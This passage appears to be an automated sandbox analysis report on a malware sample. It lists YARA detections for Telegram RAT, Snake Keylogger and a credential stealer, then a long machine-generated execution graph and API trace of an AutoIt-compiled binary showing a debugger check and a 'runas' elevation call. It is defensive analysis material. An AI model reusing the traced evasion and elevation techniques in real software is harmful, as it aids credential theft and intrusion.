• Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.3938554197.0000000000772000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.3940377959.0000000002701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3940377959.000000000280C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false


Execution Graph

Execution Coverage:3.5%
Dynamic/Decrypted Code Coverage:0.4%
Signature Coverage:7%
Total number of Nodes:2000
Total number of Limit Nodes:162
105177->105178 105178->105155 105180 fa38a6 105178->105180 105181 fdd24f 105179->105181 105182 fc2efd _W_store_winword 60 API calls 105180->105182 105183 fa3ed0 59 API calls 105181->105183 105184 fa38b1 105182->105184 105185 fdd25c 105183->105185 105184->105159 105186 fa38bb 105184->105186 105185->105185 105187 fc2efd _W_store_winword 60 API calls 105186->105187 105188 fa38c6 105187->105188 105188->105174 105189 fa3907 105188->105189 105191 fa3ed0 59 API calls 105188->105191 105189->105174 105190 fa3914 105189->105190 105192 fa92ce 59 API calls 105190->105192 105193 fa38ea 105191->105193 105194 fa3924 105192->105194 105195 fa8047 59 API calls 105193->105195 105197 fa9050 59 API calls 105194->105197 105196 fa38f8 105195->105196 105198 fa3ed0 59 API calls 105196->105198 105199 fa3932 105197->105199 105198->105189 105383 fa8ee0 105199->105383 105201 fa928a 59 API calls 105202 fa394f 105201->105202 105202->105201 105203 fa8ee0 60 API calls 105202->105203 105204 fa3ed0 59 API calls 105202->105204 105205 fa3995 Mailbox 105202->105205 105203->105202 105204->105202 105205->105075 105207 fa7292 __write_nolock 105206->105207 105208 fa72ab 105207->105208 105209 fdea22 _memset 105207->105209 105210 fa4750 60 API calls 105208->105210 105211 fdea3e GetOpenFileNameW 105209->105211 105212 fa72b4 105210->105212 105213 fdea8d 105211->105213 106234 fc0791 105212->106234 105215 fa7bcc 59 API calls 105213->105215 105217 fdeaa2 105215->105217 105217->105217 105219 fa72c9 106252 fa686a 105219->106252 105223 fb093a __write_nolock 105222->105223 106480 fa6d80 105223->106480 105225 fb093f 105237 fa3c14 105225->105237 106491 fb119e 89 API calls 105225->106491 105227 fb094c 105227->105237 106492 fb3ee7 91 API calls Mailbox 105227->106492 105229 fb0955 105230 fb0959 GetFullPathNameW 105229->105230 105229->105237 105231 fa7bcc 59 API calls 105230->105231 105232 fb0985 105231->105232 105233 fa7bcc 59 API calls 105232->105233 105234 fb0992 105233->105234 105235 fe4cab _wcscat 105234->105235 
105236 fa7bcc 59 API calls 105234->105236 105236->105237 105237->105085 105237->105093 105239 fa3ab0 LoadImageW RegisterClassExW 105238->105239 105240 fdd261 105238->105240 106529 fa3041 7 API calls 105239->106529 106530 fa47a0 LoadImageW EnumResourceNamesW 105240->106530 105243 fdd26a 105244 fa3b34 105245 fa39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 105244->105245 105245->105100 105247 fe4cc3 105246->105247 105258 fb09f5 105246->105258 106594 1009e4a 89 API calls 4 library calls 105247->106594 105254 fb0a4b PeekMessageW 105289 fb0a05 Mailbox 105254->105289 105258->105289 106595 fa9e5d 60 API calls 105258->106595 106596 ff6349 341 API calls 105258->106596 105259 fe4e81 Sleep 105259->105289 105261 fb0ce4 105265 fb0e43 PeekMessageW 105265->105289 105266 fb0ea5 TranslateMessage DispatchMessageW 105266->105265 105267 fe4d50 TranslateAcceleratorW 105267->105265 105267->105289 105268 fc0db6 59 API calls Mailbox 105268->105289 105269 fb0d13 timeGetTime 105269->105289 105270 fe581f WaitForSingleObject 105270->105289 105273 fb0e5f Sleep 105302 fb0e70 Mailbox 105273->105302 105274 fa8047 59 API calls 105274->105289 105277 fe5af8 Sleep 105277->105302 105281 fb0f4e timeGetTime 105285 fa9837 84 API calls 105285->105289 105289->105254 105289->105259 105289->105261 105289->105265 105289->105266 105289->105267 105289->105268 105289->105269 105289->105270 105289->105273 105289->105274 105289->105277 105289->105281 105289->105285 105293 fa9e5d 60 API calls 105289->105293 105289->105302 105307 fb0f95 105289->105307 105309 1009e4a 89 API calls 105289->105309 105311 fa9c90 59 API calls Mailbox 105289->105311 105312 fa9ea0 314 API calls 105289->105312 105313 fa84c0 69 API calls 105289->105313 105315 ff617e 59 API calls Mailbox 105289->105315 105316 fe55d5 VariantClear 105289->105316 105317 fe566b VariantClear 105289->105317 105318 fa8cd4 59 API calls Mailbox 105289->105318 105319 fe5419 VariantClear 105289->105319 105320 ff6e8f 59 API calls 105289->105320 105321 fa7de1 
59 API calls 105289->105321 105322 fa89b3 69 API calls 105289->105322 105293->105289 105302->105289 105302->105307 105309->105289 105311->105289 105312->105289 105313->105289 105315->105289 105316->105289 105317->105289 105318->105289 105319->105289 105320->105289 105321->105289 105322->105289 105324->105085 105325->105098 105327 fa3d3e __write_nolock 105326->105327 105328 fa7bcc 59 API calls 105327->105328 105333 fa3ea4 Mailbox 105327->105333 105330 fa3d70 105328->105330 105329 fa79f2 59 API calls 105329->105330 105330->105329 105338 fa3da6 Mailbox 105330->105338 105331 fa3e77 105332 fa7de1 59 API calls 105331->105332 105331->105333 105335 fa3e98 105332->105335 105333->105129 105334 fa7de1 59 API calls 105334->105338 105336 fa3f74 59 API calls 105335->105336 105336->105333 105337 fa3f74 59 API calls 105337->105338 105338->105331 105338->105333 105338->105334 105338->105337 105339 fa79f2 59 API calls 105338->105339 105339->105338 105433 fa4bb5 105340->105433 105345 fa4e08 LoadLibraryExW 105443 fa4b6a 105345->105443 105346 fdd8e6 105348 fa4e4a 84 API calls 105346->105348 105350 fdd8ed 105348->105350 105352 fa4b6a 3 API calls 105350->105352 105354 fdd8f5 105352->105354 105353 fa4e2f 105353->105354 105355 fa4e3b 105353->105355 105469 fa4f0b 105354->105469 105356 fa4e4a 84 API calls 105355->105356 105358 fa37d4 105356->105358 105358->105136 105358->105137 105361 fdd91c 105477 fa4ec7 105361->105477 105363 fdd929 105365 fc0db6 Mailbox 59 API calls 105364->105365 105366 fa37fb 105365->105366 105366->105150 105368 fa3eda 105367->105368 105369 fa3ef3 105367->105369 105370 fa8047 59 API calls 105368->105370 105371 fa7bcc 59 API calls 105369->105371 105372 fa3879 105370->105372 105371->105372 105373 fc2efd 105372->105373 105374 fc2f7e 105373->105374 105375 fc2f09 105373->105375 105906 fc2f90 60 API calls 3 library calls 105374->105906 105382 fc2f2e 105375->105382 105904 fc8b28 58 API calls __getptd_noexit 105375->105904 105378 fc2f8b 105378->105175 105379 fc2f15 105905 fc8db6 
9 API calls __wfsopen 105379->105905 105381 fc2f20 105381->105175 105382->105175 105384 fdf17c 105383->105384 105390 fa8ef7 105383->105390 105384->105390 105908 fa8bdb 59 API calls Mailbox 105384->105908 105386 fa8fff 105386->105202 105387 fa8ff8 105391 fc0db6 Mailbox 59 API calls 105387->105391 105388 fa9040 105907 fa9d3c 60 API calls Mailbox 105388->105907 105390->105386 105390->105387 105390->105388 105391->105386 105393 fa4ee5 85 API calls 105392->105393 105394 10095ca 105393->105394 105909 1009734 105394->105909 105397 fa4f0b 74 API calls 105398 10095f7 105397->105398 105399 fa4f0b 74 API calls 105398->105399 105400 1009607 105399->105400 105401 fa4f0b 74 API calls 105400->105401 105402 1009622 105401->105402 105403 fa4f0b 74 API calls 105402->105403 105404 100963d 105403->105404 105405 fa4ee5 85 API calls 105404->105405 105406 1009654 105405->105406 105407 fc571c __crtGetStringTypeA_stat 58 API calls 105406->105407 105408 100965b 105407->105408 105409 fc571c __crtGetStringTypeA_stat 58 API calls 105408->105409 105410 1009665 105409->105410 105411 fa4f0b 74 API calls 105410->105411 105412 1009679 105411->105412 105413 1009109 GetSystemTimeAsFileTime 105412->105413 105414 100968c 105413->105414 105415 10096a1 105414->105415 105416 10096b6 105414->105416 105419 fc2d55 _free 58 API calls 105415->105419 105417 100971b 105416->105417 105418 10096bc 105416->105418 105421 fc2d55 _free 58 API calls 105417->105421 105915 1008b06 105418->105915 105422 10096a7 105419->105422 105424 fdd186 105421->105424 105425 fc2d55 _free 58 API calls 105422->105425 105424->105140 105427 fa4e4a 105424->105427 105425->105424 105426 fc2d55 _free 58 API calls 105426->105424 105428 fa4e5b 105427->105428 105429 fa4e54 105427->105429 105431 fa4e6a 105428->105431 105432 fa4e7b FreeLibrary 105428->105432 105430 fc53a6 __fcloseall 83 API calls 105429->105430 105430->105428 105431->105140 105432->105431 105482 fa4c03 105433->105482 105436 fa4bdc 105438 fa4bec FreeLibrary 105436->105438 105439 
fa4bf5 105436->105439 105437 fa4c03 2 API calls 105437->105436 105438->105439 105440 fc525b 105439->105440 105486 fc5270 105440->105486 105442 fa4dfc 105442->105345 105442->105346 105644 fa4c36 105443->105644 105446 fa4c36 2 API calls 105449 fa4b8f 105446->105449 105447 fa4baa 105450 fa4c70 105447->105450 105448 fa4ba1 FreeLibrary 105448->105447 105449->105447 105449->105448 105451 fc0db6 Mailbox 59 API calls 105450->105451 105452 fa4c85 105451->105452 105453 fa522e 59 API calls 105452->105453 105454 fa4c91 _memmove 105453->105454 105455 fa4ccc 105454->105455 105457 fa4d89 105454->105457 105458 fa4dc1 105454->105458 105456 fa4ec7 69 API calls 105455->105456 105464 fa4cd5 105456->105464 105648 fa4e89 CreateStreamOnHGlobal 105457->105648 105659 100991b 95 API calls 105458->105659 105461 fa4f0b 74 API calls 105461->105464 105463 fa4d69 105463->105353 105464->105461 105464->105463 105465 fdd8a7 105464->105465 105654 fa4ee5 105464->105654 105466 fa4ee5 85 API calls 105465->105466 105467 fdd8bb 105466->105467 105468 fa4f0b 74 API calls 105467->105468 105468->105463 105470 fdd9cd 105469->105470 105471 fa4f1d 105469->105471 105683 fc55e2 105471->105683 105474 1009109 105881 1008f5f 105474->105881 105476 100911f 105476->105361 105478 fa4ed6 105477->105478 105479 fdd990 105477->105479 105886 fc5c60 105478->105886 105481 fa4ede 105481->105363 105483 fa4bd0 105482->105483 105484 fa4c0c LoadLibraryA 105482->105484 105483->105436 105483->105437 105484->105483 105485 fa4c1d GetProcAddress 105484->105485 105485->105483 105489 fc527c __wfsopen 105486->105489 105487 fc528f 105535 fc8b28 58 API calls __getptd_noexit 105487->105535 105489->105487 105491 fc52c0 105489->105491 105490 fc5294 105536 fc8db6 9 API calls __wfsopen 105490->105536 105505 fd04e8 105491->105505 105494 fc52c5 105495 fc52ce 105494->105495 105496 fc52db 105494->105496 105537 fc8b28 58 API calls __getptd_noexit 105495->105537 105497 fc5305 105496->105497 105498 fc52e5 105496->105498 105520 fd0607 105497->105520 
105538 fc8b28 58 API calls __getptd_noexit 105498->105538 105500 fc529f __wfsopen @_EH4_CallFilterFunc@8 105500->105442 105506 fd04f4 __wfsopen 105505->105506 105507 fc9c0b __lock 58 API calls 105506->105507 105518 fd0502 105507->105518 105508 fd057d 105545 fc881d 58 API calls 2 library calls 105508->105545 105509 fd0576 105540 fd05fe 105509->105540 105512 fd0584 105512->105509 105546 fc9e2b InitializeCriticalSectionAndSpinCount 105512->105546 105513 fd05f3 __wfsopen 105513->105494 105515 fc9c93 __mtinitlocknum 58 API calls 105515->105518 105517 fd05aa EnterCriticalSection 105517->105509 105518->105508 105518->105509 105518->105515 105543 fc6c50 59 API calls __lock 105518->105543 105544 fc6cba LeaveCriticalSection LeaveCriticalSection _doexit 105518->105544 105528 fd0627 __wopenfile 105520->105528 105521 fd0641 105551 fc8b28 58 API calls __getptd_noexit 105521->105551 105523 fd0646 105552 fc8db6 9 API calls __wfsopen 105523->105552 105525 fd085f 105548 fd85a1 105525->105548 105526 fc5310 105539 fc5332 LeaveCriticalSection LeaveCriticalSection _fprintf 105526->105539 105528->105521 105534 fd07fc 105528->105534 105553 fc37cb 60 API calls 2 library calls 105528->105553 105530 fd07f5 105530->105534 105554 fc37cb 60 API calls 2 library calls 105530->105554 105532 fd0814 105532->105534 105555 fc37cb 60 API calls 2 library calls 105532->105555 105534->105521 105534->105525 105535->105490 105536->105500 105537->105500 105538->105500 105539->105500 105547 fc9d75 LeaveCriticalSection 105540->105547 105542 fd0605 105542->105513 105543->105518 105544->105518 105545->105512 105546->105517 105547->105542 105556 fd7d85 105548->105556 105550 fd85ba 105550->105526 105551->105523 105552->105526 105553->105530 105554->105532 105555->105534 105557 fd7d91 __wfsopen 105556->105557 105558 fd7da7 105557->105558 105561 fd7ddd 105557->105561 105641 fc8b28 58 API calls __getptd_noexit 105558->105641 105560 fd7dac 105642 fc8db6 9 API calls __wfsopen 105560->105642 105567 fd7e4e 105561->105567 
105564 fd7db6 __wfsopen 105564->105550 105565 fd7df9 105643 fd7e22 LeaveCriticalSection __unlock_fhandle 105565->105643 105568 fd7e6e 105567->105568 105569 fc44ea __wsopen_nolock 58 API calls 105568->105569 105572 fd7e8a 105569->105572 105570 fc8dc6 __invoke_watson 8 API calls 105571 fd85a0 105570->105571 105573 fd7d85 __wsopen_helper 103 API calls 105571->105573 105574 fd7ec4 105572->105574 105581 fd7ee7 105572->105581 105640 fd7fc1 105572->105640 105575 fd85ba 105573->105575 105576 fc8af4 __write_nolock 58 API calls 105574->105576 105575->105565 105577 fd7ec9 105576->105577 105578 fc8b28 __wfsopen 58 API calls 105577->105578 105579 fd7ed6 105578->105579 105580 fc8db6 __wfsopen 9 API calls 105579->105580 105583 fd7ee0 105580->105583 105582 fd7fa5 105581->105582 105589 fd7f83 105581->105589 105584 fc8af4 __write_nolock 58 API calls 105582->105584 105583->105565 105585 fd7faa 105584->105585 105586 fc8b28 __wfsopen 58 API calls 105585->105586 105587 fd7fb7 105586->105587 105588 fc8db6 __wfsopen 9 API calls 105587->105588 105588->105640 105590 fcd294 __alloc_osfhnd 61 API calls 105589->105590 105591 fd8051 105590->105591 105592 fd807e 105591->105592 105593 fd805b 105591->105593 105594 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105592->105594 105595 fc8af4 __write_nolock 58 API calls 105593->105595 105604 fd80a0 105594->105604 105596 fd8060 105595->105596 105598 fc8b28 __wfsopen 58 API calls 105596->105598 105597 fd811e GetFileType 105599 fd8129 GetLastError 105597->105599 105600 fd816b 105597->105600 105602 fd806a 105598->105602 105603 fc8b07 __dosmaperr 58 API calls 105599->105603 105612 fcd52a __set_osfhnd 59 API calls 105600->105612 105601 fd80ec GetLastError 105605 fc8b07 __dosmaperr 58 API calls 105601->105605 105606 fc8b28 __wfsopen 58 API calls 105602->105606 105607 fd8150 CloseHandle 105603->105607 105604->105597 105604->105601 105608 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105604->105608 105609 fd8111 
105605->105609 105606->105583 105607->105609 105610 fd815e 105607->105610 105611 fd80e1 105608->105611 105614 fc8b28 __wfsopen 58 API calls 105609->105614 105613 fc8b28 __wfsopen 58 API calls 105610->105613 105611->105597 105611->105601 105616 fd8189 105612->105616 105615 fd8163 105613->105615 105614->105640 105615->105609 105617 fd8344 105616->105617 105618 fd18c1 __lseeki64_nolock 60 API calls 105616->105618 105638 fd820a 105616->105638 105619 fd8517 CloseHandle 105617->105619 105617->105640 105620 fd81f3 105618->105620 105621 fd7cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105619->105621 105623 fc8af4 __write_nolock 58 API calls 105620->105623 105620->105638 105622 fd853e 105621->105622 105624 fd8572 105622->105624 105625 fd8546 GetLastError 105622->105625 105623->105638 105624->105640 105626 fc8b07 __dosmaperr 58 API calls 105625->105626 105627 fd8552 105626->105627 105631 fcd43d __free_osfhnd 59 API calls 105627->105631 105628 fd0add __close_nolock 61 API calls 105628->105638 105629 fd0e5b 70 API calls __read_nolock 105629->105638 105630 fd823c 105632 fd97a2 __chsize_nolock 82 API calls 105630->105632 105630->105638 105631->105624 105632->105630 105633 fd18c1 60 API calls __lseeki64_nolock 105633->105638 105634 fcd886 __write 78 API calls 105634->105638 105635 fd83c1 105636 fd0add __close_nolock 61 API calls 105635->105636 105637 fd83c8 105636->105637 105639 fc8b28 __wfsopen 58 API calls 105637->105639 105638->105617 105638->105628 105638->105629 105638->105630 105638->105633 105638->105634 105638->105635 105639->105640 105640->105570 105641->105560 105642->105564 105643->105564 105645 fa4b83 105644->105645 105646 fa4c3f LoadLibraryA 105644->105646 105645->105446 105645->105449 105646->105645 105647 fa4c50 GetProcAddress 105646->105647 105647->105645 105649 fa4ea3 FindResourceExW 105648->105649 105653 fa4ec0 105648->105653 105650 fdd933 LoadResource 105649->105650 105649->105653 105651 fdd948 SizeofResource 105650->105651 105650->105653 105652 
fdd95c LockResource 105651->105652 105651->105653 105652->105653 105653->105455 105655 fdd9ab 105654->105655 105656 fa4ef4 105654->105656 105660 fc584d 105656->105660 105658 fa4f02 105658->105464 105659->105455 105661 fc5859 __wfsopen 105660->105661 105662 fc586b 105661->105662 105664 fc5891 105661->105664 105673 fc8b28 58 API calls __getptd_noexit 105662->105673 105675 fc6c11 105664->105675 105665 fc5870 105674 fc8db6 9 API calls __wfsopen 105665->105674 105668 fc5897 105681 fc57be 83 API calls 5 library calls 105668->105681 105670 fc58a6 105682 fc58c8 LeaveCriticalSection LeaveCriticalSection _fprintf 105670->105682 105672 fc587b __wfsopen 105672->105658 105673->105665 105674->105672 105676 fc6c21 105675->105676 105677 fc6c43 EnterCriticalSection 105675->105677 105676->105677 105678 fc6c29 105676->105678 105679 fc6c39 105677->105679 105680 fc9c0b __lock 58 API calls 105678->105680 105679->105668 105680->105679 105681->105670 105682->105672 105686 fc55fd 105683->105686 105685 fa4f2e 105685->105474 105687 fc5609 __wfsopen 105686->105687 105688 fc564c 105687->105688 105689 fc5644 __wfsopen 105687->105689 105695 fc561f _memset 105687->105695 105690 fc6c11 __lock_file 59 API calls 105688->105690 105689->105685 105691 fc5652 105690->105691 105699 fc541d 105691->105699 105693 fc5639 105714 fc8db6 9 API calls __wfsopen 105693->105714 105713 fc8b28 58 API calls __getptd_noexit 105695->105713 105701 fc5438 _memset 105699->105701 105705 fc5453 105699->105705 105700 fc5443 105811 fc8b28 58 API calls __getptd_noexit 105700->105811 105701->105700 105701->105705 105707 fc5493 105701->105707 105703 fc5448 105812 fc8db6 9 API calls __wfsopen 105703->105812 105715 fc5686 LeaveCriticalSection LeaveCriticalSection _fprintf 105705->105715 105707->105705 105708 fc55a4 _memset 105707->105708 105716 fc46e6 105707->105716 105723 fd0e5b 105707->105723 105791 fd0ba7 105707->105791 105813 fd0cc8 58 API calls 3 library calls 105707->105813 105814 fc8b28 58 API calls __getptd_noexit 
105708->105814 105713->105693 105714->105689 105715->105689 105717 fc4705 105716->105717 105718 fc46f0 105716->105718 105717->105707 105815 fc8b28 58 API calls __getptd_noexit 105718->105815 105720 fc46f5 105816 fc8db6 9 API calls __wfsopen 105720->105816 105722 fc4700 105722->105707 105724 fd0e7c 105723->105724 105725 fd0e93 105723->105725 105826 fc8af4 58 API calls __getptd_noexit 105724->105826 105727 fd15cb 105725->105727 105732 fd0ecd 105725->105732 105842 fc8af4 58 API calls __getptd_noexit 105727->105842 105729 fd0e81 105827 fc8b28 58 API calls __getptd_noexit 105729->105827 105730 fd15d0 105843 fc8b28 58 API calls __getptd_noexit 105730->105843 105734 fd0ed5 105732->105734 105739 fd0eec 105732->105739 105828 fc8af4 58 API calls __getptd_noexit 105734->105828 105735 fd0ee1 105844 fc8db6 9 API calls __wfsopen 105735->105844 105737 fd0eda 105829 fc8b28 58 API calls __getptd_noexit 105737->105829 105740 fd0f01 105739->105740 105743 fd0f1b 105739->105743 105744 fd0f39 105739->105744 105771 fd0e88 105739->105771 105830 fc8af4 58 API calls __getptd_noexit 105740->105830 105743->105740 105748 fd0f26 105743->105748 105831 fc881d 58 API calls 2 library calls 105744->105831 105746 fd0f49 105749 fd0f6c 105746->105749 105750 fd0f51 105746->105750 105817 fd5c6b 105748->105817 105834 fd18c1 60 API calls 3 library calls 105749->105834 105832 fc8b28 58 API calls __getptd_noexit 105750->105832 105751 fd103a 105753 fd10b3 ReadFile 105751->105753 105758 fd1050 GetConsoleMode 105751->105758 105756 fd10d5 105753->105756 105757 fd1593 GetLastError 105753->105757 105755 fd0f56 105833 fc8af4 58 API calls __getptd_noexit 105755->105833 105756->105757 105764 fd10a5 105756->105764 105760 fd1093 105757->105760 105761 fd15a0 105757->105761 105762 fd1064 105758->105762 105763 fd10b0 105758->105763 105774 fd1099 105760->105774 105835 fc8b07 58 API calls 3 library calls 105760->105835 105840 fc8b28 58 API calls __getptd_noexit 105761->105840 105762->105763 105766 fd106a ReadConsoleW 
105762->105766 105763->105753 105773 fd1377 105764->105773 105764->105774 105776 fd110a 105764->105776 105766->105764 105768 fd108d GetLastError 105766->105768 105767 fd15a5 105841 fc8af4 58 API calls __getptd_noexit 105767->105841 105768->105760 105771->105707 105772 fc2d55 _free 58 API calls 105772->105771 105773->105774 105778 fd147d ReadFile 105773->105778 105774->105771 105774->105772 105777 fd1176 ReadFile 105776->105777 105782 fd11f7 105776->105782 105779 fd1197 GetLastError 105777->105779 105789 fd11a1 105777->105789 105784 fd14a0 GetLastError 105778->105784 105790 fd14ae 105778->105790 105779->105789 105780 fd12b4 105785 fd1264 MultiByteToWideChar 105780->105785 105838 fd18c1 60 API calls 3 library calls 105780->105838 105781 fd12a4 105837 fc8b28 58 API calls __getptd_noexit 105781->105837 105782->105774 105782->105780 105782->105781 105782->105785 105784->105790 105785->105768 105785->105774 105789->105776 105836 fd18c1 60 API calls 3 library calls 105789->105836 105790->105773 105839 fd18c1 60 API calls 3 library calls 105790->105839 105792 fd0bb2 105791->105792 105795 fd0bc7 105791->105795 105878 fc8b28 58 API calls __getptd_noexit 105792->105878 105794 fd0bb7 105879 fc8db6 9 API calls __wfsopen 105794->105879 105797 fd0bfc 105795->105797 105803 fd0bc2 105795->105803 105880 fd5fe4 58 API calls __malloc_crt 105795->105880 105799 fc46e6 __fflush_nolock 58 API calls 105797->105799 105800 fd0c10 105799->105800 105845 fd0d47 105800->105845 105802 fd0c17 105802->105803 105804 fc46e6 __fflush_nolock 58 API calls 105802->105804 105803->105707 105805 fd0c3a 105804->105805 105805->105803 105806 fc46e6 __fflush_nolock 58 API calls 105805->105806 105807 fd0c46 105806->105807 105807->105803 105808 fc46e6 __fflush_nolock 58 API calls 105807->105808 105809 fd0c53 105808->105809 105810 fc46e6 __fflush_nolock 58 API calls 105809->105810 105810->105803 105811->105703 105812->105705 105813->105707 105814->105703 105815->105720 105816->105722 105818 fd5c76 105817->105818 
105819 fd5c83 105817->105819 105820 fc8b28 __wfsopen 58 API calls 105818->105820 105822 fd5c8f 105819->105822 105823 fc8b28 __wfsopen 58 API calls 105819->105823 105821 fd5c7b 105820->105821 105821->105751 105822->105751 105824 fd5cb0 105823->105824 105825 fc8db6 __wfsopen 9 API calls 105824->105825 105825->105821 105826->105729 105827->105771 105828->105737 105829->105735 105830->105737 105831->105746 105832->105755 105833->105771 105834->105748 105835->105774 105836->105789 105837->105774 105838->105785 105839->105790 105840->105767 105841->105774 105842->105730 105843->105735 105844->105771 105846 fd0d53 __wfsopen 105845->105846 105847 fd0d77 105846->105847 105848 fd0d60 105846->105848 105850 fd0e3b 105847->105850 105851 fd0d8b 105847->105851 105849 fc8af4 __write_nolock 58 API calls 105848->105849 105853 fd0d65 105849->105853 105852 fc8af4 __write_nolock 58 API calls 105850->105852 105854 fd0da9 105851->105854 105855 fd0db6 105851->105855 105856 fd0dae 105852->105856 105857 fc8b28 __wfsopen 58 API calls 105853->105857 105858 fc8af4 __write_nolock 58 API calls 105854->105858 105859 fd0dd8 105855->105859 105860 fd0dc3 105855->105860 105863 fc8b28 __wfsopen 58 API calls 105856->105863 105867 fd0d6c __wfsopen 105857->105867 105858->105856 105862 fcd206 ___lock_fhandle 59 API calls 105859->105862 105861 fc8af4 __write_nolock 58 API calls 105860->105861 105864 fd0dc8 105861->105864 105865 fd0dde 105862->105865 105866 fd0dd0 105863->105866 105868 fc8b28 __wfsopen 58 API calls 105864->105868 105869 fd0e04 105865->105869 105870 fd0df1 105865->105870 105873 fc8db6 __wfsopen 9 API calls 105866->105873 105867->105802 105868->105866 105871 fc8b28 __wfsopen 58 API calls 105869->105871 105872 fd0e5b __read_nolock 70 API calls 105870->105872 105874 fd0e09 105871->105874 105875 fd0dfd 105872->105875 105873->105867 105876 fc8af4 __write_nolock 58 API calls 105874->105876 105877 fd0e33 __read LeaveCriticalSection 105875->105877 105876->105875 105877->105867 105878->105794 
105879->105803 105880->105797 105884 fc520a GetSystemTimeAsFileTime 105881->105884 105883 1008f6e 105883->105476 105885 fc5238 __aulldiv 105884->105885 105885->105883 105887 fc5c6c __wfsopen 105886->105887 105888 fc5c7e 105887->105888 105889 fc5c93 105887->105889 105900 fc8b28 58 API calls __getptd_noexit 105888->105900 105891 fc6c11 __lock_file 59 API calls 105889->105891 105893 fc5c99 105891->105893 105892 fc5c83 105901 fc8db6 9 API calls __wfsopen 105892->105901 105902 fc58d0 67 API calls 5 library calls 105893->105902 105896 fc5c8e __wfsopen 105896->105481 105897 fc5ca4 105903 fc5cc4 LeaveCriticalSection LeaveCriticalSection _fprintf 105897->105903 105899 fc5cb6 105899->105896 105900->105892 105901->105896 105902->105897 105903->105899 105904->105379 105905->105381 105906->105378 105907->105386 105908->105390 105913 1009748 __tzset_nolock _wcscmp 105909->105913 105910 10095dc 105910->105397 105910->105424 105911 fa4f0b 74 API calls 105911->105913 105912 1009109 GetSystemTimeAsFileTime 105912->105913 105913->105910 105913->105911 105913->105912 105914 fa4ee5 85 API calls 105913->105914 105914->105913 105916 1008b1f 105915->105916 105917 1008b11 105915->105917 105919 1008b64 105916->105919 105920 fc525b 115 API calls 105916->105920 105930 1008b28 105916->105930 105918 fc525b 115 API calls 105917->105918 105918->105916 105946 1008d91 105919->105946 105922 1008b49 105920->105922 105922->105919 105924 1008b52 105922->105924 105923 1008ba8 105925 1008bac 105923->105925 105926 1008bcd 105923->105926 105927 fc53a6 __fcloseall 83 API calls 105924->105927 105924->105930 105929 1008bb9 105925->105929 105932 fc53a6 __fcloseall 83 API calls 105925->105932 105950 10089a9 105926->105950 105927->105930 105929->105930 105935 fc53a6 __fcloseall 83 API calls 105929->105935 105930->105426 105932->105929 105933 1008bfb 105959 1008c2b 105933->105959 105934 1008bdb 105937 fc53a6 __fcloseall 83 API calls 105934->105937 105938 1008be8 105934->105938 105935->105930 105937->105938 
105938->105930 105940 fc53a6 __fcloseall 83 API calls 105938->105940 105940->105930 105943 1008c16 105943->105930 105945 fc53a6 __fcloseall 83 API calls 105943->105945 105945->105930 105947 1008db6 105946->105947 105948 1008d9f __tzset_nolock _memmove 105946->105948 105949 fc55e2 __fread_nolock 74 API calls 105947->105949 105948->105923 105949->105948 105951 fc571c __crtGetStringTypeA_stat 58 API calls 105950->105951 105952 10089b8 105951->105952 105953 fc571c __crtGetStringTypeA_stat 58 API calls 105952->105953 105954 10089cc 105953->105954 105955 fc571c __crtGetStringTypeA_stat 58 API calls 105954->105955 105956 10089e0 105955->105956 105957 1008d0d 58 API calls 105956->105957 105958 10089f3 105956->105958 105957->105958 105958->105933 105958->105934 105963 1008c40 105959->105963 105960 1008cf8 105992 1008f35 105960->105992 105961 1008a05 74 API calls 105961->105963 105963->105960 105963->105961 105966 1008c02 105963->105966 105988 1008e12 105963->105988 105996 1008aa1 74 API calls 105963->105996 105967 1008d0d 105966->105967 105968 1008d20 105967->105968 105969 1008d1a 105967->105969 105971 1008d31 105968->105971 105973 fc2d55 _free 58 API calls 105968->105973 105970 fc2d55 _free 58 API calls 105969->105970 105970->105968 105972 1008c09 105971->105972 105974 fc2d55 _free 58 API calls 105971->105974 105972->105943 105975 fc53a6 105972->105975 105973->105971 105974->105972 105976 fc53b2 __wfsopen 105975->105976 105977 fc53de 105976->105977 105978 fc53c6 105976->105978 105981 fc6c11 __lock_file 59 API calls 105977->105981 105984 fc53d6 __wfsopen 105977->105984 106045 fc8b28 58 API calls __getptd_noexit 105978->106045 105980 fc53cb 106046 fc8db6 9 API calls __wfsopen 105980->106046 105983 fc53f0 105981->105983 106029 fc533a 105983->106029 105984->105943 105989 1008e21 105988->105989 105990 1008e61 105988->105990 105989->105963 105990->105989 105997 1008ee8 105990->105997 105993 1008f42 105992->105993 105994 1008f53 105992->105994 105995 fc4863 80 API calls 
[Control-flow graph rendering omitted: the extraction kept only the edge list of basic-block ids, addresses and called APIs for the preceding function, which is not readable as text.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FA3B68
• IsDebuggerPresent.KERNEL32 ref: 00FA3B7A
• GetFullPathNameW.KERNEL32(00007FFF,?,?,010652F8,010652E0,?,?), ref: 00FA3BEB
  • Part of subcall function 00FA7BCC: _memmove.LIBCMT ref: 00FA7C06
  • Part of subcall function 00FB092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00FA3C14,010652F8,?,?,?), ref: 00FB096E
• SetCurrentDirectoryW.KERNEL32(?), ref: 00FA3C6F
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,01057770,00000010), ref: 00FDD281
• SetCurrentDirectoryW.KERNEL32(?,010652F8,?,?,?), ref: 00FDD2B9
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01054260,010652F8,?,?,?), ref: 00FDD33F
• ShellExecuteW.SHELL32(00000000,?,?), ref: 00FDD346
  • Part of subcall function 00FA3A46: GetSysColorBrush.USER32(0000000F), ref: 00FA3A50
